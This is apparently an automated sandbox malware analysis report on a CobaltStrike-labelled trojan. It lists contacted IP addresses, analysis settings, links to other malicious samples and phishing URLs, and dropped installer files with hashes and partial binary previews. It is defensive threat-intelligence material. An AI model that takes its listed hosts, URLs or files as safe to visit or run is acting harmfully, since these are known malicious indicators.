                                                                                    		unknownAustralia
                                                                                    		136478GAPL-AS-APGreyhoundAustraliaPtyLtdAUfalse
                                                                                    193.228.1.130
                                                                                    		unknownUnited Kingdom
                                                                                    		8220COLTCOLTTechnologyServicesGroupLimitedGBfalse
                                                                                    78.129.140.65
                                                                                    		unknownUnited Kingdom
                                                                                    		20860IOMART-ASGBfalse
                                                                                    45.153.187.96
                                                                                    		unknownBulgaria
                                                                                    		202448MVPShttpswwwmvpsnetEUfalse
                                                                                    217.138.219.219
                                                                                    		unknownUnited Kingdom
                                                                                    		9009M247GBfalse
                                                                                    185.194.94.71
                                                                                    		unknownLuxembourg
                                                                                    		43219EVERYCITYGRfalse
                                                                                    146.70.82.3
                                                                                    		unknownUnited Kingdom
                                                                                    		2018TENET-1ZAfalse
                                                                                    185.99.133.112
                                                                                    		unknownBelarus
                                                                                    		61138ZAPPIE-HOST-ASZappieHostGBfalse
                                                                                    103.131.189.11
                                                                                    		unknownSingapore
                                                                                    		135134SOONKEATNEO-AS-APSoonKeatNeoSGfalse
                                                                                    217.12.221.61
                                                                                    		unknownUkraine
                                                                                    		15626ITLASUAfalse
                                                                                    116.202.176.26
                                                                                    		unknownGermany
                                                                                    		24940HETZNER-ASDEfalse
                                                                                    52.65.235.129
                                                                                    		unknownUnited States
                                                                                    		16509AMAZON-02USfalse
                                                                                    103.76.129.94
                                                                                    		unknownIndia
                                                                                    		45814FARIYA-PKFariyaNetworksPvtLtdPKfalse
                                                                                    173.249.203.52
                                                                                    		unknownUnited States
                                                                                    		11878TZULOUSfalse
                                                                                    23.137.249.26
                                                                                    		unknownReserved
                                                                                    		397614GTLAKESUSfalse
                                                                                    23.184.48.19
                                                                                    		unknownReserved
                                                                                    		394656CPA-AS1USfalse
                                                                                    84.33.14.10
                                                                                    		unknownItaly
                                                                                    		34081SERVER24-ASINCUBATECGmbH-SrlITfalse
                                                                                    84.33.245.10
                                                                                    		unknownItaly
                                                                                    		34081SERVER24-ASINCUBATECGmbH-SrlITfalse
                                                                                    37.120.234.251
                                                                                    		unknownRomania
                                                                                    		3210SECURE-DATA-ASROfalse
                                                                                    85.114.138.119
                                                                                    		unknownGermany
                                                                                    		24961MYLOC-ASIPBackboneofmyLocmanagedITAGDEfalse
                                                                                    88.218.206.137
                                                                                    		unknownUnited Kingdom
                                                                                    		210025XXSLXXSLNetworkNLfalse
                                                                                    38.45.64.117
                                                                                    		unknownUnited States
                                                                                    		174COGENT-174USfalse
                                                                                    176.97.192.12
                                                                                    		unknownRussian Federation
                                                                                    		51351ASOSKNETCZfalse
                                                                                    102.222.106.165
                                                                                    		unknownunknown
                                                                                    		36926CKL1-ASNKEfalse
                                                                                    5.1.66.255
                                                                                    		unknownGermany
                                                                                    		34549MEER-ASmeerfarbigGmbHCoKGDEfalse
                                                                                    209.58.147.36
                                                                                    		unknownUnited States
                                                                                    		394380LEASEWEB-USA-DAL-10USfalse
                                                                                    185.66.143.178
                                                                                    		unknownNetherlands
                                                                                    		43350NFORCENLfalse
                                                                                    178.239.174.244
                                                                                    		unknownUnited Kingdom
                                                                                    		25369BANDWIDTH-ASGBfalse
                                                                                    185.134.196.54
                                                                                    		unknownUnited Kingdom
                                                                                    		41495FAELIXGBfalse
                                                                                    172.64.134.39
                                                                                    		unknownUnited States
                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                    79.124.77.3
                                                                                    		unknownBulgaria
                                                                                    		203380DAINTERNATIONALGROUPGBfalse
                                                                                    185.71.138.138
                                                                                    		unknownUnited Kingdom
                                                                                    		43513NANO-ASLVfalse
                                                                                    95.215.19.53
                                                                                    		unknownSweden
                                                                                    		39287ABSTRACT-ASSEfalse
                                                                                    80.67.169.12
                                                                                    		unknownFrance
                                                                                    		20766GITOYEN-MAIN-ASThemainAutonomousSystemofGitoyenParisfalse
                                                                                    164.68.121.162
                                                                                    		unknownGermany
                                                                                    		51167CONTABODEfalse
                                                                                    199.119.65.94
                                                                                    		unknownUnited States
                                                                                    		57695MISAKA-BACKBONE-ASMisakaNetworkIncBackboneUSfalse
                                                                                    176.111.219.126
                                                                                    		unknownSwitzerland
                                                                                    		57957ERUXO-ASNCHfalse
                                                                                    143.244.33.74
                                                                                    		unknownUnited States
                                                                                    		174COGENT-174USfalse
                                                                                    95.143.196.190
                                                                                    		unknownSweden
                                                                                    		49770INTERNETPORT-ASSEfalse
                                                                                    198.7.58.227
                                                                                    		unknownUnited States
                                                                                    		30633LEASEWEB-USA-WDCUSfalse
                                                                                    163.172.34.56
                                                                                    		unknownUnited Kingdom
                                                                                    		12876OnlineSASFRfalse
                                                                                    43.128.60.6
                                                                                    		unknownJapan4249LILLY-ASUSfalse
                                                                                    64.42.181.227
                                                                                    		unknownUnited States
                                                                                    		63018DEDICATEDUSfalse
                                                                                    188.244.117.114
                                                                                    		unknownUnited Kingdom
                                                                                    		21060ASN-ATEA-DKfalse
                                                                                    89.36.162.187
                                                                                    		unknownRomania
                                                                                    		51656BEST-TELECOMROfalse
                                                                                    45.41.204.204
                                                                                    		unknownReserved
                                                                                    		22400WEB2OBJECTSUSfalse
                                                                                    95.179.131.82
                                                                                    		unknownNetherlands
                                                                                    		20473AS-CHOOPAUSfalse
                                                                                    45.90.59.193
                                                                                    		unknownBulgaria
                                                                                    		204957GREENFLOID-ASUAfalse
                                                                                    212.47.228.136
                                                                                    		unknownFrance
                                                                                    		12876OnlineSASFRfalse
                                                                                    154.16.159.22
                                                                                    		unknownSouth Africa
                                                                                    		397384LAUNCHVPSUSfalse
                                                                                    104.128.190.108
                                                                                    		unknownReserved
                                                                                    		26827EPBTELECOMUSfalse
                                                                                    170.249.237.154
                                                                                    		unknownUnited States
                                                                                    		63410PRIVATESYSTEMSUSfalse
                                                                                    66.187.7.140
                                                                                    		unknownUnited States
                                                                                    		7296ALCHEMYNETUSfalse
                                                                                    9.9.9.9
                                                                                    		unknownUnited States
                                                                                    		19281QUAD9-AS-1USfalse
                                                                                    37.120.211.91
                                                                                    		unknownRomania
                                                                                    		9009M247GBfalse
                                                                                    71.19.251.34
                                                                                    		unknownCanada
                                                                                    		11831ESECUREDATACAfalse
                                                                                    37.120.217.75
                                                                                    		unknownRomania
                                                                                    		9009M247GBfalse
                                                                                    37.120.235.187
                                                                                    		unknownRomania
                                                                                    		3210SECURE-DATA-ASROfalse
                                                                                    185.22.154.19
                                                                                    		unknownRussian Federation
                                                                                    		51659ASBAXETRUfalse
                                                                                    37.120.152.235
                                                                                    		unknownRomania
                                                                                    		9009M247GBfalse
                                                                                    185.150.99.255
                                                                                    		unknownGermany
                                                                                    		34549MEER-ASmeerfarbigGmbHCoKGDEfalse
                                                                                    45.86.162.110
                                                                                    		unknownGermany
                                                                                    		8100ASN-QUADRANET-GLOBALUSfalse
                                                                                    212.126.59.63
                                                                                    		unknownIreland
                                                                                    		31122DIGIWEB-ASIEfalse
                                                                                    146.70.135.59
                                                                                    		unknownUnited Kingdom
                                                                                    		2018TENET-1ZAfalse
                                                                                    193.201.188.48
                                                                                    		unknownUnited Kingdom
                                                                                    		25546BROOKLANDCOMP-ASGBfalse
                                                                                    1.0.0.1
                                                                                    		unknownAustralia
                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                    89.117.2.17
                                                                                    		unknownLithuania
                                                                                    		15419LRTC-ASLTfalse
                                                                                    37.120.151.11
                                                                                    		unknownRomania
                                                                                    		9009M247GBfalse
                                                                                    194.135.119.45
                                                                                    		unknownRussian Federation
                                                                                    		16509AMAZON-02USfalse
                                                                                    185.222.222.222
                                                                                    		unknownEuropean Union
                                                                                    		6233XTOMUSfalse
                                                                                    37.120.232.43
                                                                                    		unknownRomania
                                                                                    		3210SECURE-DATA-ASROfalse
                                                                                    68.183.253.200
                                                                                    		unknownUnited States
                                                                                    		14061DIGITALOCEAN-ASNUSfalse
                                                                                    43.159.77.199
                                                                                    		unknownJapan4249LILLY-ASUSfalse
                                                                                    169.239.128.124
                                                                                    		unknownSeychelles
                                                                                    		61138ZAPPIE-HOST-ASZappieHostGBfalse
                                                                                    37.120.142.115
                                                                                    		unknownRomania
                                                                                    		9009M247GBfalse
                                                                                    103.114.162.65
                                                                                    		unknownSingapore
                                                                                    		35913DEDIPATH-LLCUSfalse
                                                                                    9.9.9.12
                                                                                    		unknownUnited States
                                                                                    		19281QUAD9-AS-1USfalse
                                                                                    23.19.117.55
                                                                                    		unknownUnited States
                                                                                    		393886LEASEWEB-USA-MIA-11USfalse
                                                                                    108.181.101.27
                                                                                    		unknownCanada
                                                                                    		852ASN852CAfalse
                                                                                    128.127.104.108
                                                                                    		unknownSweden
                                                                                    		51430ALTUSNLfalse

                                                                                    General Information

                                                                                    Joe Sandbox version:40.0.0 Tourmaline
                                                                                    Analysis ID:1407646
                                                                                    Start date and time:2024-03-12 16:31:13 +01:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 13m 56s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:default.jbs
                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                    Number of analysed new started processes analysed:46
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:0
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Sample name:SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll
                                                                                    (renamed file extension from exe to dll)
                                                                                    Original Sample Name:SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.exe
                                                                                    Detection:MAL
                                                                                    Classification:mal100.bank.troj.adwa.evad.winDLL@100/73@47/100
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 57.1%
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 94%
                                                                                    • Number of executed functions: 295
                                                                                    • Number of non-executed functions: 146
                                                                                    Cookbook Comments:
                                                                                    • Override analysis time to 240s for rundll32

                                                                                    Warnings

                                                                                    • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
                                                                                    • Execution Graph export aborted for target dnscrypt-proxy.exe, PID 7492 because there are no executed function
                                                                                    • Execution Graph export aborted for target dnscrypt-proxy.exe, PID 7540 because there are no executed function
                                                                                    • Execution Graph export aborted for target dnscrypt-proxy.exe, PID 7572 because there are no executed function
                                                                                    • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                    • Report size exceeded maximum capacity and may have missing network information.
                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                    • VT rate limit hit for: SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll

                                                                                    Simulations

                                                                                    Behavior and APIs

                                                                                    TimeTypeDescription
                                                                                    16:31:59API Interceptor1495865x Sleep call for process: rundll32.exe modified
                                                                                    16:32:36API Interceptor262723x Sleep call for process: Anycast.exe modified
                                                                                    16:36:04API Interceptor1x Sleep call for process: loaddll64.exe modified

                                                                                    Joe Sandbox View / Context

                                                                                    IPs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    185.199.109.133SecuriteInfo.com.Trojan.Win32.Penguish.aqk.2138.32152.exeGet hashmaliciousAsyncRATBrowse
                                                                                      https://metamaske.top/about-1.htmlGet hashmaliciousUnknownBrowse
                                                                                        https://fastapi-utils.davidmontague.xyz/Get hashmaliciousUnknownBrowse
                                                                                          wDvP2xlcAg.exeGet hashmaliciousNeshta, XWormBrowse
                                                                                            SecuriteInfo.com.FileRepMalware.26162.12640.exeGet hashmaliciousUnknownBrowse
                                                                                              https://mirror.accuris.caGet hashmaliciousUnknownBrowse
                                                                                                https://github.com/maurice-daly/DriverAutomationTool/tree/master/Current%20Branch/7.2.3Get hashmaliciousUnknownBrowse
                                                                                                  https://www.google.me/amp/s/github%E3%80%82com%2FLordWigs%2FSac%2Freleases%2Fdownload%2FSac%2FPayment-advice-pdf.jarGet hashmaliciousUnknownBrowse
                                                                                                    https://www.canva.com/design/DAF-AKdx1iQ/gxF6_iQ8jJGpA-rLPIarSw/view?utm_content=DAF-AKdx1iQ&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                                                                      https://storage.googleapis.com/padlet-uploads/2318737749/e11f67ab2830522d7b573fb49bdabc3c/api.html?Expires=1708704323&GoogleAccessId=778043051564-q79bsd8mc40b0bl82ikkrtc3jdofe4dg%40developer.gserviceaccount.com&Signature=AA0enpH3m0AKKLfgwp8M4uCwuX8%2FvOXZj%2FfwxQ93S115RqLjpWPI7BezhazOP2Qe6%2FuJzzmPfCIgYc%2FjpHmbD%2FqUejmM7KcaIzsOKIzy8DZ%2FYF6Od5Ykctr1NHfEOd4jTfOhblMozUvRfdFcbJAFxBWC4svkQeN9IwC6bL8%2BT1E%3D&original-url=https%3A%2F%2Fpadlet-uploads.storage.googleapis.com%2F2318737749%2Fe11f67ab2830522d7b573fb49bdabc3c%2Fapi.htmlGet hashmaliciousHTMLPhisherBrowse

                                                                                                        Domains

                                                                                                        No context

                                                                                                        ASNs

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        AS41564SELIL2hLY8io.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 196.199.44.181
                                                                                                        otbbi2vYPM.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 196.199.44.190
                                                                                                        wxRXrz2MKa.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 196.196.226.177
                                                                                                        huhu.x86-20240212-0910.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                        • 196.199.44.127
                                                                                                        Banka odeme havale makbuzu 20240209 TL950000900.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 196.196.197.220
                                                                                                        https://www.essentials-pakistan.com/Get hashmaliciousUnknownBrowse
                                                                                                        • 196.247.60.153
                                                                                                        https://www.alcphilippines.com/Get hashmaliciousUnknownBrowse
                                                                                                        • 165.231.36.15
                                                                                                        https://www.bimbaylolaoutletfrance.com/Get hashmaliciousUnknownBrowse
                                                                                                        • 196.196.197.228
                                                                                                        https://www.alcphilippines.com/400.shtmlGet hashmaliciousUnknownBrowse
                                                                                                        • 165.231.36.15
                                                                                                        https://www.butycolumbia.com/Get hashmaliciousUnknownBrowse
                                                                                                        • 196.196.197.150
                                                                                                        ASN852CABf4yNkgmR6.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 108.172.131.103
                                                                                                        HUXwk7lplj.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 161.188.185.36
                                                                                                        dvfLh8WEag.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 75.154.211.176
                                                                                                        YupN2xJdGj.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 199.175.181.127
                                                                                                        3GC0htmNYP.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 108.173.226.173
                                                                                                        X4hQbUq5Ib.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 161.188.162.113
                                                                                                        https://c4dvq8xh5u.pages.dev/smart89/Get hashmaliciousUnknownBrowse
                                                                                                        • 108.181.47.111
                                                                                                        SecuriteInfo.com.Variant.Lazy.491971.13845.291.exeGet hashmaliciousQuasarBrowse
                                                                                                        • 108.181.47.111
                                                                                                        SecuriteInfo.com.IL.Trojan.MSILZilla.35146.9856.2573.exeGet hashmaliciousPureLog Stealer, Quasar, zgRATBrowse
                                                                                                        • 108.181.47.111
                                                                                                        SecuriteInfo.com.Linux.Siggen.9999.3745.25857.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 75.157.39.199
                                                                                                        ANYNODEUSkH5MfuKUfl.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 69.85.89.151
                                                                                                        aA8sPbK4EG.elfGet hashmaliciousMoobotBrowse
                                                                                                        • 69.85.89.102
                                                                                                        vUvgbnhi3T.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 69.85.89.111
                                                                                                        zsGh6GOugh.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 69.85.89.101
                                                                                                        PxVi5a4DLz.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 209.198.8.74
                                                                                                        tdyrg1IdiM.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                        • 45.59.122.81
                                                                                                        QYqXYpTo9nLX2kX.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 45.59.122.86
                                                                                                        RFQ#0080220023.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 45.59.125.74
                                                                                                        PO-20230822.docGet hashmaliciousFormBookBrowse
                                                                                                        • 45.59.122.86
                                                                                                        PO-384728493049.docGet hashmaliciousFormBookBrowse
                                                                                                        • 45.59.122.86
                                                                                                        FREENETDEfreenetDatenkommunikationsGmbHDECtEeMS3H62.exeGet hashmaliciousAmadey, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Stealc, VidarBrowse
                                                                                                        • 89.58.27.85
                                                                                                        SecuriteInfo.com.Linux.Siggen.9999.3745.25857.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 89.59.82.3
                                                                                                        jew.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 89.63.204.237
                                                                                                        WiFMm8X57J.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 89.59.121.122
                                                                                                        ZsjdXE5R8J.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 89.62.186.145
                                                                                                        3MO4T9rluA.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 89.63.89.213
                                                                                                        rDaOraovjl.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 89.60.204.99
                                                                                                        WK435uvZpp.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 89.52.244.180
                                                                                                        MtiYXbx5ow.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 89.54.124.101
                                                                                                        crvEujmluK.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                        • 89.49.3.126
                                                                                                        ANCHGLOBAL-AS-APAnchnetAsiaLimitedHKomLMIQ8D45.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 156.253.18.36
                                                                                                        1j86Z7v5Y4.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 156.253.18.87
                                                                                                        cBY69mSf3Y.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 156.241.153.153
                                                                                                        zyisUVQR9o.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 103.79.122.247
                                                                                                        https://agks007.com/Get hashmaliciousUnknownBrowse
                                                                                                        • 45.192.178.158
                                                                                                        https://o2o.monoiykiit.scjlmfjx.com/Get hashmaliciousUnknownBrowse
                                                                                                        • 45.192.178.158
                                                                                                        BmXGd4hx74.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 156.241.153.132
                                                                                                        skid.x86Get hashmaliciousMiraiBrowse
                                                                                                        • 156.253.18.36
                                                                                                        fattura proforma pdf.exe.xzGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                        • 156.241.129.87
                                                                                                        skyljne.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 156.241.153.131

                                                                                                        JA3 Fingerprints

                                                                                                        No context

                                                                                                        Dropped Files

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        C:\Program Files (x86)\Anycast\Microsoft.Bcl.AsyncInterfaces.dllDervish-Document-Reader.zipGet hashmaliciousUnknownBrowse
                                                                                                          Dervish-Document-Reader.zipGet hashmaliciousUnknownBrowse
                                                                                                            Thunderstore Mod Manager - Installer.exeGet hashmaliciousUnknownBrowse
                                                                                                              EgnyteConnectWin.msiGet hashmaliciousUnknownBrowse
                                                                                                                EgnyteDesktopApp_3.15.3_136.msiGet hashmaliciousUnknownBrowse
                                                                                                                  EgnyteConnectWin.msiGet hashmaliciousUnknownBrowse
                                                                                                                    NordVPNSetup.exeGet hashmaliciousBazaLoader, Mars Stealer, VidarBrowse
                                                                                                                      NordVPNSetup.exeGet hashmaliciousBazaLoader, Mars Stealer, VidarBrowse
                                                                                                                        FaceID Pro.msiGet hashmaliciousUnknownBrowse
                                                                                                                          pRTafycKx1.exeGet hashmaliciousETERNALBLUEBrowse

                                                                                                                            Created / dropped Files

                                                                                                                            C:\Program Files (x86)\Anycast\Anycast VPN.url

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:MS Windows 95 Internet shortcut text (URL=<https://hm2buy.com>), ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):44
                                                                                                                            Entropy (8bit):4.544325652580696
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:HRAbABGQYm2fc5LGKFn:HRYFVm4crF
                                                                                                                            MD5:DDC66987C1A0BACD009409869E635D79
                                                                                                                            SHA1:A6E0D0347D7B4B686CED7033A3FA83E97C9C8C75
                                                                                                                            SHA-256:804FF63DB74DFDA3C2FFB6F947A76ABF6E883F077E8E45B6C9C959AA4158A729
                                                                                                                            SHA-512:09F1CB558601734290CF69291D4750AD77F84B01DFF31971A28A801C3000CD1C8D7EA47C1A66EB403261E80A25360333B30024F7861B422A4258A1741A08E54A
                                                                                                                            Malicious:false
                                                                                                                            Preview:[InternetShortcut]..URL=https://hm2buy.com..

                                                                                                                            C:\Program Files (x86)\Anycast\Anycast.exe

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1483856
                                                                                                                            Entropy (8bit):7.3869854650764575
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24576:xLRHAgfSVJbyeUyUCiWx6drqLwU6H/544tbp+pa40vK1f43kwBa:zvubRHnxm+F6f+4hQY40S1fD
                                                                                                                            MD5:DF90ED2B8D1C23A3AD6A8338BFE4A9C6
                                                                                                                            SHA1:B02DC10C8CFDE967F621EE490EC8C0186D4D505E
                                                                                                                            SHA-256:14FB8ABAA99C742FA685871C39874348433888DA5CE5CF6F4656E99FFE99497A
                                                                                                                            SHA-512:B138E53C2F132071994B92C97D2AB3F6E7BEE10D5794CF2550B6AB318C053B41B959A11E4DA3D446075AB4BF96EBD3F55A3CBA2457089C65B015D2684AC98931
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$.=..........."...0.............Z.... ... ....@.. ....................................`.....................................O.... ..|............~..P&..........t...8............................................ ............... ..H............text...`.... ...................... ..`.rsrc...|.... ......................@..@.reloc...............|..............@..B................<.......H.......L...............Lk..(.............................................{F...*..{G...*..{H...*r.(I.....}F.....}G.....}H...*....0..Y........u........L.,G(J....{F....{F...oK...,/(L....{G....{G...oM...,.(N....{H....{H...oO...*.*.*....0..K....... .y.> )UU.Z(J....{F...oP...X )UU.Z(L....{G...oQ...X )UU.Z(N....{H...oR...X*..0...........r...p......%..{F......%q.........-.&.+.......oS....%..{G......%q.........-.&.+.......oS....%..{H......%q.........-.&.+.......oS....(T...*..{U...*..

                                                                                                                            C:\Program Files (x86)\Anycast\Anycast.exe.config

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):2782
                                                                                                                            Entropy (8bit):4.910096924231006
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:48:cjr7HVEaON7HqPrdOuLfLHQGveLawLnLk/Ld8Su8SgSwDb3vrwDrEAvxOE7O7Rgv:ur71HC7KPrdtzHvveakL6zogSKLvrGA6
                                                                                                                            MD5:033FF8AB43E649E831B5F176D85C4CE5
                                                                                                                            SHA1:AC93AAD9BA111E68950F839E7FD4517A6BA9EE67
                                                                                                                            SHA-256:212B9EAE5C07E54018E97A22249CFDCDAE8762FD3AE8054AECEF696A3DEA1E1A
                                                                                                                            SHA-512:3B3DC2500FA3FE15EEE5111CC4CE248AC3291B5DFFCD24F1E98909AEDE17E9FAAE6A43EF974269EBAA34FD21455C785A3290E07F5FEC92EAB1DD334B562EE17A
                                                                                                                            Malicious:false
                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <sectionGroup name="userSettings" type="System.Configuration.UserSettingsGroup, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089">.. <section name="Anycast.Properties.Settings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" allowExeDefinition="MachineToLocalUser" requirePermission="false" />.. </sectionGroup>.. </configSections>.. <startup>.. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.6.1" />.. </startup>.. <userSettings>.. <Anycast.Properties.Settings>.. <setting name="AccessToken" serializeAs="String">.. <value />.. </setting>.. <setting name="RefreshToken" serializeAs="String">.. <value />.. </setting>.. <setting name="UpgradeRequired" serializeAs="String">.. <value>True</value>.. </setting>.. <setting name="A

                                                                                                                            C:\Program Files (x86)\Anycast\Hardcodet.NotifyIcon.Wpf.dll

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):109248
                                                                                                                            Entropy (8bit):7.336866137611231
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3072:2/gu/9xJqtT30J2ZsUZT3Zm6L34SVRZw05:2/gu/9negEskTQ6LjGI
                                                                                                                            MD5:D3B4402A6801CCEDD096E260A87162BD
                                                                                                                            SHA1:A0DA53FAA1BD3A4C62B9FD87D73EFF4253FEDCD7
                                                                                                                            SHA-256:5B3E111250B6AB98A74F780A249A908C18EE0DEBED8CA284FD2C7E73F0561D2A
                                                                                                                            SHA-512:1E9925014C59C3B566C7AEE80DFF8CEA18292044FEDDD23ACD1B108561A3656D051A8D8D00B3535FFBEF882DE492830E952946FE4195452FE0D48FF0088C5310
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....N............" ..0..p.............. ........... ....................................`.....................................O....................|..................p............................................ ............... ..H............text....n... ...p.................. ..`.rsrc................r..............@..@.reloc...............z..............@..B........................H........O..pw..................$.......................................V!.)1......s.........*...0..$........u......,...o....*.u......,...o....*.0..&........u......,....o ...*.u......,....o!...*...0..&........u......,....o"...*.u......,....o#...*B.(Y...-.(....*.*..{!...*"..}!...*>.{....o.......*.0..9........(*.....($.....(......,..o%...-..,..o&...-..,..o%...*.*.*....0...........s'...}.....((....(....-..s....+.(....}......{....o....(....}.....(!....{...........s)...o.....{....

                                                                                                                            C:\Program Files (x86)\Anycast\Microsoft.Bcl.AsyncInterfaces.dll

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):20872
                                                                                                                            Entropy (8bit):6.448532891103289
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:69P2wZOXm7YJVHTe+0VJI0vrdaVemxO/f7vWeq/WIdHRN7bg30uw7lGsV9W+:u2zmYrHCV9cIL6TbtCSW
                                                                                                                            MD5:1EE251645B8A54A116D6D06C83A2BD85
                                                                                                                            SHA1:5DBF1534FFBFF016CC45559EB5EFF3DC4252A522
                                                                                                                            SHA-256:075CE79E84041137C78885B3738C1B5A03547D0AE2A79916E844196A9D0EC1DB
                                                                                                                            SHA-512:9F67FD0566EAC2DA4253D08697DAAB427E4E85780615D940F086A88424DCBB0563ABAE7E4824088E64EF7024C1BB3BBF324F2D07BC7BA55F79E4AF3C9EA88E97
                                                                                                                            Malicious:false
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                            Joe Sandbox View:
                                                                                                                            • Filename: Dervish-Document-Reader.zip, Detection: malicious, Browse
                                                                                                                            • Filename: Dervish-Document-Reader.zip, Detection: malicious, Browse
                                                                                                                            • Filename: Thunderstore Mod Manager - Installer.exe, Detection: malicious, Browse
                                                                                                                            • Filename: EgnyteConnectWin.msi, Detection: malicious, Browse
                                                                                                                            • Filename: EgnyteDesktopApp_3.15.3_136.msi, Detection: malicious, Browse
                                                                                                                            • Filename: EgnyteConnectWin.msi, Detection: malicious, Browse
                                                                                                                            • Filename: NordVPNSetup.exe, Detection: malicious, Browse
                                                                                                                            • Filename: NordVPNSetup.exe, Detection: malicious, Browse
